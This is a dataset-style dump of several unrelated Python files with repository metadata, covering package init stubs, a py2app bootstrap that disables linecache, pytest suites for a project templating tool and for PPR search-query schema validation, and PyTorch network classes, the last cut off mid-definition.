e7f82077b1fd4c2ec5afa463973ecde599209549
|
[
"MIT"
] | null | null | null |
library/libvirt_filter.py
|
bkmeneguello/ansible-role-libvirt
|
e7f82077b1fd4c2ec5afa463973ecde599209549
|
[
"MIT"
] | null | null | null |
# TODO: https://libvirt.org/formatnwfilter.html
| 47 | 47 | 0.787234 | 6 | 47 | 6.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 47 | 1 | 47 | 47 | 0.822222 | 0.957447 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 1 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
71f16750be3a7d0922d774531a82147a9b72ab6b
| 44 |
py
|
Python
|
scrapper/playstation/__init__.py
|
gghf-service/gghf-api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | 1 |
2018-12-10T14:37:11.000Z
|
2018-12-10T14:37:11.000Z
|
scrapper/playstation/__init__.py
|
tapkain/gghf.api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | null | null | null |
scrapper/playstation/__init__.py
|
tapkain/gghf.api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | null | null | null |
from scrapper.playstation.spider import main
| 44 | 44 | 0.886364 | 6 | 44 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 44 | 1 | 44 | 44 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
71fafe5ef80b5403322b57c793f98a2f2f5a763c
| 213 |
py
|
Python
|
venv/lib/python3.9/site-packages/py2app/bootstrap/disable_linecache.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | 193 |
2020-01-15T09:34:20.000Z
|
2022-03-18T19:14:16.000Z
|
.eggs/py2app-0.21-py3.7.egg/py2app/bootstrap/disable_linecache.py
|
mdanisurrahmanrony/Covid-Doctor
|
1e0e854d01325c1a18dd52f33064aed4c21b8161
|
[
"Apache-2.0"
] | 185 |
2020-01-15T08:38:27.000Z
|
2022-03-27T17:29:29.000Z
|
.eggs/py2app-0.21-py3.7.egg/py2app/bootstrap/disable_linecache.py
|
mdanisurrahmanrony/Covid-Doctor
|
1e0e854d01325c1a18dd52f33064aed4c21b8161
|
[
"Apache-2.0"
] | 23 |
2020-01-24T14:47:18.000Z
|
2022-02-22T17:19:47.000Z
|
def _disable_linecache():
    import linecache

    def fake_getline(*args, **kwargs):
        return ""

    linecache.orig_getline = linecache.getline
    linecache.getline = fake_getline


_disable_linecache()
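# [Added usage sketch -- not part of the original record.] Once the patch
# above has run, every linecache lookup returns the empty string, so
# tracebacks rendered by the interpreter omit source-line text.
if __name__ == '__main__':
    import linecache
    print(repr(linecache.getline(__file__, 1)))  # -> '' after the patch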
| 17.75 | 46 | 0.704225 | 22 | 213 | 6.5 | 0.454545 | 0.223776 | 0.321678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.206573 | 213 | 11 | 47 | 19.363636 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.142857 | 0.142857 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 |
0
| 6 |
9c1b5e47507c017924313ed766676fc6ec9af4a7
| 316 |
py
|
Python
|
tests/test_data/lazy_mod.py
|
brettcannon/modutil
|
a34794ffee9b6217a9ced41baddab09b4f034cbb
|
[
"BSD-3-Clause"
] | 17 |
2018-04-21T01:15:52.000Z
|
2021-01-16T23:58:51.000Z
|
tests/test_data/lazy_mod.py
|
brettcannon/modutil
|
a34794ffee9b6217a9ced41baddab09b4f034cbb
|
[
"BSD-3-Clause"
] | 9 |
2018-04-20T23:29:07.000Z
|
2019-07-25T17:21:29.000Z
|
tests/test_data/lazy_mod.py
|
brettcannon/modutil
|
a34794ffee9b6217a9ced41baddab09b4f034cbb
|
[
"BSD-3-Clause"
] | 3 |
2020-02-27T18:10:01.000Z
|
2021-01-05T07:22:19.000Z
|
import modutil

mod, __getattr__ = modutil.lazy_import(__name__,
                                       ['tests.test_data.A', '.B', '.C as still_C'])


def trigger_A():
    return mod.A


def trigger_B():
    return mod.B


def trigger_C():
    return mod.still_C


def trigger_failure():
    return mod.does_not_exist
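# [Added usage sketch -- not part of the original record.] Nothing under
# tests.test_data is imported until a trigger function touches an attribute
# on `mod`; modutil resolves the import on first access. For example:
#
#   from tests.test_data import lazy_mod
#   a_module = lazy_mod.trigger_A()   # first access performs the real import
#   lazy_mod.trigger_failure()        # expected to raise, as 'does_not_exist'
#                                     # was never registered with lazy_import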
| 17.555556 | 84 | 0.607595 | 44 | 316 | 3.954545 | 0.477273 | 0.229885 | 0.103448 | 0.183908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.278481 | 316 | 17 | 85 | 18.588235 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | true | 0 | 0.181818 | 0.363636 | 0.909091 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 |
0
| 6 |
9c47360ad31544c866959d439dec3d10ef843fd1
| 2,730 |
py
|
Python
|
package/tests/test_init_command.py
|
MrKriss/stonemason
|
d78becc9168c2566b31b48c9a951e2823bc98362
|
[
"MIT"
] | 2 |
2017-11-13T17:40:52.000Z
|
2021-05-08T15:58:28.000Z
|
package/tests/test_init_command.py
|
MrKriss/masonry
|
d78becc9168c2566b31b48c9a951e2823bc98362
|
[
"MIT"
] | 3 |
2017-09-03T22:58:37.000Z
|
2017-09-12T21:45:27.000Z
|
package/tests/test_init_command.py
|
MrKriss/stonemason
|
d78becc9168c2566b31b48c9a951e2823bc98362
|
[
"MIT"
] | null | null | null |
from pathlib import Path

import pytest
import git
import json

from conftest import TEST_DIR


def test_init_with_project(tmpdir):
    output_path = Path(tmpdir.strpath)

    # Set arguments
    args = f"init -o {output_path} {TEST_DIR}/example_templates/python_project"

    from masonry import main

    # Run from entry point
    main.main(args=args)

    # Check files were created
    package_name = 'testpackage'
    files = [
        '.git/',
        '.mason',
        'MANIFEST.in',
        'README',
        'requirements.txt',
        'setup.py',
        'src/testpackage',
        'src/testpackage/__init__.py',
        'src/testpackage/main.py'
    ]
    for f in files:
        p = output_path / package_name / f
        assert p.exists()

    # Check requirements were populated
    target = "requests\nlogzero\n"
    req_file = output_path / package_name / 'requirements.txt'
    result = req_file.read_text()
    assert result == target

    # Check git repo was created and commits made
    repo_dir = output_path / package_name
    r = git.Repo(repo_dir.as_posix())
    log = r.git.log(pretty='oneline').split('\n')
    assert len(log) == 1
    assert "Add 'package' template layer via stone mason." in log[0]


def test_init_with_project_and_template(tmpdir, no_prompts):
    output_path = Path(tmpdir.strpath)

    # Set arguments
    args = f"init -o {output_path} {TEST_DIR}/example_templates/python_project/pytest"

    from masonry import main

    # Run from entry point
    main.main(args=args)

    # Check files were created
    package_name = 'testpackage'
    files = [
        '.git/',
        '.mason',
        'MANIFEST.in',
        'README',
        'requirements.txt',
        'setup.py',
        'src/testpackage',
        'src/testpackage/__init__.py',
        'src/testpackage/main.py',
        'tests/test_foo.py'
    ]
    for f in files:
        p = output_path / package_name / f
        assert p.exists()

    # Check requirements were populated
    target = "requests\nlogzero\npytest\npytest-cov\ncoverage\n"
    req_file = output_path / package_name / 'requirements.txt'
    result = req_file.read_text()
    assert result == target

    # Check MANIFEST was prefixed
    target = "graft tests\ngraft src\n"
    manifest_file = output_path / package_name / 'MANIFEST.in'
    result = manifest_file.read_text()
    assert result == target

    # Check git repo was created and commits made
    repo_dir = output_path / package_name
    r = git.Repo(repo_dir.as_posix())
    log = r.git.log(pretty='oneline').split('\n')
    assert len(log) == 2
    assert "Add 'pytest' template layer via stone mason." in log[0]
    assert "Add 'package' template layer via stone mason." in log[1]
| 26.764706 | 86 | 0.642125 | 355 | 2,730 | 4.769014 | 0.256338 | 0.064973 | 0.070289 | 0.086828 | 0.853514 | 0.812758 | 0.812758 | 0.812758 | 0.793266 | 0.793266 | 0 | 0.002443 | 0.250183 | 2,730 | 101 | 87 | 27.029703 | 0.824621 | 0.110989 | 0 | 0.652174 | 0 | 0 | 0.288732 | 0.100249 | 0 | 0 | 0 | 0 | 0.144928 | 1 | 0.028986 | false | 0 | 0.101449 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
9c68e55390ec5a85f2cfdfcd46e61487ba6ce000
| 9,871 |
py
|
Python
|
tests/unit/ppr/test_search_query.py
|
doug-lovett/test-schemas-dl
|
a05e87b983f2c3559c081dd65aff05e2c67e6186
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/ppr/test_search_query.py
|
doug-lovett/test-schemas-dl
|
a05e87b983f2c3559c081dd65aff05e2c67e6186
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/ppr/test_search_query.py
|
doug-lovett/test-schemas-dl
|
a05e87b983f2c3559c081dd65aff05e2c67e6186
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2020 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Suite to ensure the PPR Search Query schema is valid."""
import copy

from registry_schemas import validate
from registry_schemas.example_data.ppr import SEARCH_QUERY


def test_valid_search_query_ind_debtor():
    """Assert that the schema is performing as expected for a search by individual debtor."""
    query = copy.deepcopy(SEARCH_QUERY)
    query['type'] = 'INDIVIDUAL_DEBTOR'
    del query['criteria']['debtorName']['business']
    del query['criteria']['value']
    del query['clientReferenceId']
    del query['startDateTime']
    del query['endDateTime']
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert is_valid


def test_valid_search_query_bus_debtor():
    """Assert that the schema is performing as expected for a search by business debtor."""
    query = copy.deepcopy(SEARCH_QUERY)
    query['type'] = 'BUSINESS_DEBTOR'
    del query['criteria']['debtorName']['first']
    del query['criteria']['debtorName']['second']
    del query['criteria']['debtorName']['last']
    del query['criteria']['value']
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert is_valid


def test_valid_search_query_airdot():
    """Assert that the schema is performing as expected for a search by aircraft DOT."""
    query = copy.deepcopy(SEARCH_QUERY)
    query['type'] = 'AIRCRAFT_DOT'
    del query['criteria']['debtorName']
    query['criteria']['value'] = 'CFYXW'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert is_valid


def test_valid_search_query_regnum():
    """Assert that the schema is performing as expected for a search by registration number."""
    query = copy.deepcopy(SEARCH_QUERY)
    query['type'] = 'REGISTRATION_NUMBER'
    del query['criteria']['debtorName']
    query['criteria']['value'] = '023001B'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert is_valid


def test_valid_search_query_mhrnum():
    """Assert that the schema is performing as expected for a search by MHR number."""
    query = copy.deepcopy(SEARCH_QUERY)
    query['type'] = 'MHR_NUMBER'
    del query['criteria']['debtorName']
    query['criteria']['value'] = '21324'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert is_valid


def test_valid_search_query_serialnum():
    """Assert that the schema is performing as expected for a search by serial number."""
    query = copy.deepcopy(SEARCH_QUERY)
    query['type'] = 'SERIAL_NUMBER'
    del query['criteria']['debtorName']
    query['criteria']['value'] = 'KM8J3CA46JU622994'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert is_valid


def test_invalid_search_query_missing_type():
    """Assert that an invalid search query fails - type is missing."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['type']
    del query['criteria']['debtorName']['business']
    del query['criteria']['value']
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_missing_criteria():
    """Assert that an invalid search query fails - criteria is missing."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_type():
    """Assert that an invalid search query fails - type is invalid."""
    query = copy.deepcopy(SEARCH_QUERY)
    query['type'] = 'XXXXXXXX'
    del query['criteria']['debtorName']['business']
    del query['criteria']['value']
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_criteria():
    """Assert that an invalid search query fails - criteria is invalid."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['debtorName']['business']
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_busname():
    """Assert that an invalid search query fails - business name is too short."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['debtorName']['first']
    del query['criteria']['debtorName']['second']
    del query['criteria']['debtorName']['last']
    del query['criteria']['value']
    query['criteria']['debtorName']['business'] = 'XXXX'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_value():
    """Assert that an invalid search query fails - value is too long."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['debtorName']
    query['criteria']['value'] = 'XxxxxxxxxxxxxxxxxxxxXxxxxxxxxxxxxxxxxxxxXxxxxxxxxxx'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_debtor():
    """Assert that an invalid search query fails - debtor name is invalid."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['value']
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_firstname():
    """Assert that an invalid search query fails - debtor first name is too long."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['value']
    del query['criteria']['debtorName']['business']
    query['criteria']['debtorName']['first'] = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_secondname():
    """Assert that an invalid search query fails - debtor second name is too long."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['value']
    del query['criteria']['debtorName']['business']
    query['criteria']['debtorName']['second'] = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_lastname():
    """Assert that an invalid search query fails - debtor last name is too long."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['value']
    del query['criteria']['debtorName']['business']
    query['criteria']['debtorName']['last'] = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_clientref():
    """Assert that an invalid search query fails - client reference id is too long."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['value']
    del query['criteria']['debtorName']['business']
    query['clientReferenceId'] = 'XxxxxxxxxxXxxxxxxxxxX'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_startts():
    """Assert that an invalid search query fails - start date time format is invalid."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['value']
    del query['criteria']['debtorName']['business']
    query['startDateTime'] = 'Xxxxxxxxxx'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid


def test_invalid_search_query_endts():
    """Assert that an invalid search query fails - end date time format is invalid."""
    query = copy.deepcopy(SEARCH_QUERY)
    del query['criteria']['value']
    del query['criteria']['debtorName']['business']
    query['endDateTime'] = 'Xxxxxxxxxx'
    is_valid, errors = validate(query, 'searchQuery', 'ppr')
    if errors:
        for err in errors:
            print(err.message)
        print(errors)
    assert not is_valid
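# [Added usage sketch -- not part of the original record.] The shared pattern
# in every test above: deep-copy the SEARCH_QUERY example, mutate one field,
# and validate against the 'searchQuery' schema:
#
#   query = copy.deepcopy(SEARCH_QUERY)
#   query['type'] = 'REGISTRATION_NUMBER'
#   del query['criteria']['debtorName']
#   query['criteria']['value'] = '023001B'
#   is_valid, errors = validate(query, 'searchQuery', 'ppr')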
| 28.042614 | 95 | 0.668524 | 1,220 | 9,871 | 5.289344 | 0.122951 | 0.090346 | 0.084302 | 0.084612 | 0.824733 | 0.818069 | 0.816829 | 0.76755 | 0.679374 | 0.650085 | 0 | 0.003727 | 0.211731 | 9,871 | 351 | 96 | 28.122507 | 0.825472 | 0.20545 | 0 | 0.783019 | 0 | 0 | 0.195289 | 0.021354 | 0 | 0 | 0 | 0 | 0.089623 | 1 | 0.089623 | false | 0 | 0.014151 | 0 | 0.103774 | 0.179245 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
13037ede58d748bec28747c289956464268c2ceb
| 118 |
py
|
Python
|
ddt/__init__.py
|
GawenChen/test_pytest
|
da7a29dc43e8027d3fd1a05054480ed7007131c3
|
[
"Apache-2.0"
] | null | null | null |
ddt/__init__.py
|
GawenChen/test_pytest
|
da7a29dc43e8027d3fd1a05054480ed7007131c3
|
[
"Apache-2.0"
] | null | null | null |
ddt/__init__.py
|
GawenChen/test_pytest
|
da7a29dc43e8027d3fd1a05054480ed7007131c3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@Time : 2021/10/9 17:51
@Auth : 潇湘
@File :__init__.py.py
@IDE :PyCharm
@QQ : 810400085
"""
| 14.75 | 23 | 0.576271 | 19 | 118 | 3.368421 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 0.169492 | 118 | 8 | 24 | 14.75 | 0.438776 | 0.923729 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
130e4d54c2deae9e851943dbae96e38707ce57ce
| 46 |
py
|
Python
|
stringtoiso/__init__.py
|
vats98754/stringtoiso
|
985da5efa26111ef1d92b7026b5d5d68f0101ef1
|
[
"MIT"
] | null | null | null |
stringtoiso/__init__.py
|
vats98754/stringtoiso
|
985da5efa26111ef1d92b7026b5d5d68f0101ef1
|
[
"MIT"
] | null | null | null |
stringtoiso/__init__.py
|
vats98754/stringtoiso
|
985da5efa26111ef1d92b7026b5d5d68f0101ef1
|
[
"MIT"
] | null | null | null |
from stringtoiso.convert_to_iso import convert
| 46 | 46 | 0.913043 | 7 | 46 | 5.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 46 | 1 | 46 | 46 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
134951456249066bc57415ee60860d0f10fe18d8
| 160 |
py
|
Python
|
dev/phonts/visualization/phonts.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 4 |
2018-01-18T19:59:56.000Z
|
2020-08-25T11:56:52.000Z
|
dev/phonts/visualization/phonts.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1 |
2018-04-22T23:02:13.000Z
|
2018-04-22T23:02:13.000Z
|
dev/phonts/visualization/phonts.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1 |
2019-09-14T07:04:42.000Z
|
2019-09-14T07:04:42.000Z
|
import pypospack.io.phonts as phonts
# <---- additional classes and functions to add on top of
# <---- pypospack.io.phonts go here
if __name__ == "__main__":
    pass  # placeholder: no driver code for the visualization yet
| 20 | 60 | 0.6875 | 21 | 160 | 4.857143 | 0.809524 | 0.215686 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18125 | 160 | 7 | 61 | 22.857143 | 0.778626 | 0.55 | 0 | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
136b533fe267643a58604244ebaf15ea2c8117bd
| 11 |
py
|
Python
|
ls10.py
|
yu961549745/pynote
|
5976aeeca6368c0956baddf6a9ccb93ae8e0612a
|
[
"MIT"
] | null | null | null |
ls10.py
|
yu961549745/pynote
|
5976aeeca6368c0956baddf6a9ccb93ae8e0612a
|
[
"MIT"
] | null | null | null |
ls10.py
|
yu961549745/pynote
|
5976aeeca6368c0956baddf6a9ccb93ae8e0612a
|
[
"MIT"
] | null | null | null |
'''
IO
'''
| 2.75 | 3 | 0.181818 | 1 | 11 | 2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 11 | 3 | 4 | 3.666667 | 0.25 | 0.181818 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
b9aaf0198d21a1cb3a68b8836041445460cf7efd
| 379 |
py
|
Python
|
bruges/util/__init__.py
|
hyperiongeo/bruges
|
6d9a3aae86aaa53107caaa20e9aafa390358b0f8
|
[
"Apache-2.0"
] | null | null | null |
bruges/util/__init__.py
|
hyperiongeo/bruges
|
6d9a3aae86aaa53107caaa20e9aafa390358b0f8
|
[
"Apache-2.0"
] | null | null | null |
bruges/util/__init__.py
|
hyperiongeo/bruges
|
6d9a3aae86aaa53107caaa20e9aafa390358b0f8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
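# Convenience re-exports: expose the most-used bruges.util helpers at the
# package level (e.g. bruges.util.rms).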
from .util import rms
from .util import moving_average
from .util import moving_avg_conv
from .util import moving_avg_fft
from .util import normalize
from .util import next_pow2
from .util import top_and_tail
from .util import extrapolate
from .util import nearest
from .util import deprecated
from .util import apply_along_axis
from .util import sigmoid
| 27.071429 | 34 | 0.804749 | 61 | 379 | 4.836066 | 0.409836 | 0.325424 | 0.569492 | 0.20339 | 0.155932 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006135 | 0.139842 | 379 | 13 | 35 | 29.153846 | 0.898773 | 0.055409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
b9b3501a4a1a7bee83abdc50e1932071f97c2394
| 12,427 |
py
|
Python
|
networks/networks.py
|
ayyuriss/TRHPO
|
56a06d3593504647b75589ab87b5c96bdab74c9f
|
[
"MIT"
] | null | null | null |
networks/networks.py
|
ayyuriss/TRHPO
|
56a06d3593504647b75589ab87b5c96bdab74c9f
|
[
"MIT"
] | null | null | null |
networks/networks.py
|
ayyuriss/TRHPO
|
56a06d3593504647b75589ab87b5c96bdab74c9f
|
[
"MIT"
] | null | null | null |
from torch import nn
import numpy as np
import base.basenetwork as BaseN
from networks.cholesky import CholeskyBlock
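# A collection of fully-connected and convolutional networks. Each class
# assembles an nn.Sequential model, usually ending in an EigenLayer head,
# and registers it via BaseNetwork.compile().
# (CholeskyBlock is imported but not used in this module.)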
class FCNet(BaseN.BaseNetwork):
name ="FCNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCNet,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),nn.Softplus(),
nn.Linear(1024,512),nn.Tanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0]))
self.compile()
class FCSpectralNet(BaseN.BaseNetwork):
name ="FCSpectralNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCSpectralNet,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),BaseN.AdaptiveTanh(),
nn.Linear(1024,1024),BaseN.AdaptiveTanh(),
nn.Linear(1024,512),BaseN.AdaptiveTanh(),
BaseN.EigenLayer(512,self.output_shape[0]))
self.compile()
class FCSpectralMNet(BaseN.BaseNetwork):
name ="FCSpectralMNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCSpectralMNet,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),nn.ReLU(),
nn.Linear(1024,1024),nn.ReLU(),
nn.Linear(1024,512),nn.ReLU(),
nn.Linear(512,self.output_shape[0]-1),nn.Tanh(),
BaseN.EigenLayer())
self.compile()
class FCNetQ(BaseN.BaseNetwork):
name ="FCNetQ"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCNetQ,self).__init__(input_shape,output_shape,owner_name)
x = int(np.prod(input_shape))
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(x,x),nn.Tanh(),
nn.Linear(x,self.output_shape[0]))
self.compile()
class ConvNet(BaseN.BaseNetwork):
name="ConvNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNet,self).__init__(input_shape,output_shape,owner_name)
        self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.ReLU(),
